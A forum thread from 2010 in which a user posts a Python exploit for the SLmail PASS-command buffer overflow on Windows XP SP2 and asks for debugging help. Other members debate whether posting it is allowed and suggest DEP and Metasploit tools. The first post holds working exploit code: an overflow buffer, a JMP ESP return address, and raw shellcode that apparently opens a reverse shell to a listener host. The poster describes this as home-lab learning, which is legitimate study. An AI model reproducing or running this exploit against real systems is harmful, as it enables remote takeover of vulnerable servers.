-
January 7th, 2010, 02:53 AM
#1
Junior Member
Please help
The target is an xp sp2 machine running a SLmail server which I know is vulnerable to buffer overflow with the PASS command. So I whipped up the following script:
#!/usr/bin/python
import struct
import socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
shellcode =("\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24" +
"\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f" +
"\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84" +
"\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28" +
"\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c" +
"\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64" +
"\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x5e" +
"\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32" +
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50" +
"\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff" +
"\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43" +
"\x53\x43\x53\xff\xd0\x68\xc0\xa8\x02\x6c\x66\x68\x11\x5c" +
"\x66\x53\x89\xe1\x95\x68\xec\xf9\xaa\x60\x57\xff\xd6\x6a" +
"\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d\x6a\x50" +
"\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\x95" +
"\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab" +
"\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51" +
"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05" +
"\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6" +
"\x79\xff\x75\x04\xff\xd6\xff\x77\xfc\xff\xd0\x68\xf0\x8a" +
"\x04\x5f\x53\xff\xd6\xff\xd0")
# where 0x01c7a18b is a JMP ESP in user32.dll on xp sp2
# buffer = '\x41' * 4654 + struct.pack('<L', 0x01c7a18b) + '\x90' * 16 +shellcode
buffer = '\x41' * 4654 + '\x42' * 4 + '\x43' * 48
print "\nSending evil buffer..."
s.connect (('192.168.2.104',110))
data = s.recv(1024)
s.send('USER ftp' + '\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
data = s.recv(1024)
s.close()
the resulting crash shows my four B's sitting pretty in EIP but when I pass the address of a JMP ESP in user32.dll (done in this case by changing the commented line) the resulting crash holds a different address in EIP which does not point towards my shellcode.
I am certain that some one will point out my stupid mistake easily but I have been working on this all day and still it does not work...
Thanks in advance for the help,
Ey3l45h
Last edited by ey3l45h; January 7th, 2010 at 04:17 PM.
Reason: I copied and pasted the wrong version of the script.
-
January 7th, 2010, 12:19 PM
#2
You are obviously going to get banned if you don't remove that. While I am sure you are not going to read this, anyways - http://antionline.com/faq.php?faq=vb...eading_posting
Parth Maniar,
CISSP, CISM, CISA, SSCP
*Thank you GOD*
Greater the Difficulty, SWEETER the Victory.
Believe in yourself.
-
January 7th, 2010, 01:42 PM
#3
If he's the owner of the machine he's attempting this on, there isn't any law being broken. Wasn't asked in the best manner, but, if the machine is his, there shouldn't be an issue. Other than others here probably not wanting to answer since we have a corporate owner who has to be responsible for any problems on here. The staff here are generally into the stuff we do here (I mean the staff, the mods obviously have an interest) but their bosses, probably not heh.
-
January 7th, 2010, 03:54 PM
#4
Junior Member
@byte~ I am sorry I did not see any where in the rules where it said that one could not post educational projects. Of course this is for practice on my home lab. If you could please link me to something which shows a rule I have broken I would be the first to remove my post. Thanks for the flaming.
@gore~ I recognize that I could have worded that better. I have been a long time reader of AO and this was my first post. If you have some advice which would help in the future maybe some other forums which would be able to help I would love to hear it.
The question still stands I still don't know why the address I am entering is destroying the stack in such a way that I can not get to my JMP ESP.
k thanx bye,
ey3l45h
-
January 7th, 2010, 04:01 PM
#5
Doesn't even look like the shell is sent to anything at all. It just looks like an unused string in this script to me.
-
January 7th, 2010, 04:16 PM
#6
Junior Member
@~Spec You are right I was changing a few I am about to edit that... it did get sent in the script that I ran. I accidentally did not add it to the end of the commented line...
-
January 8th, 2010, 12:11 AM
#7
Not sure but can this be any service to you?
Data Execution Prevention (DEP) is a security feature included in modern Microsoft Windows operating systems that is intended to prevent an application or service from executing code from a non-executable memory region. This helps prevent certain exploits that store code via a buffer overflow, for example.
http://en.wikipedia.org/wiki/Data_Execution_Prevention
I believe metasploit has some wrappers to defeat this protection. Just convert script procedure to your code.
-
January 8th, 2010, 01:08 AM
#8
-
January 8th, 2010, 01:29 AM
#9
I didn't see a problem with it so I left it alone too. He owns the machine and is simply trying to learn something, and isn't breaking any laws since, again, the machine is his, so he can do with it what he likes. So I just left it alone to grow lol.
-
January 8th, 2010, 01:55 AM
#10
I run a ton of scans and exploits against VMs in my home network. I always figured if I had a problem, I could rely on the members of AO to help me out. Just because something could possibly be used for illegal purposes, doesn't mean that it is evil. One of my favorite past times is running exploits against systems, while performing a packet capture, and looking at the results. It is a good way to observe suspicious network activity. From what I can tell the OP doesn't have malicious intent, but is trying to learn how to write/launch exploit code, which in and of itself is not a bad thing. Maybe like learning how to fire a gun... ??
\"Those of us that had been up all night were in no mood for coffee and donuts, we wanted strong drink.\"
-HST
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|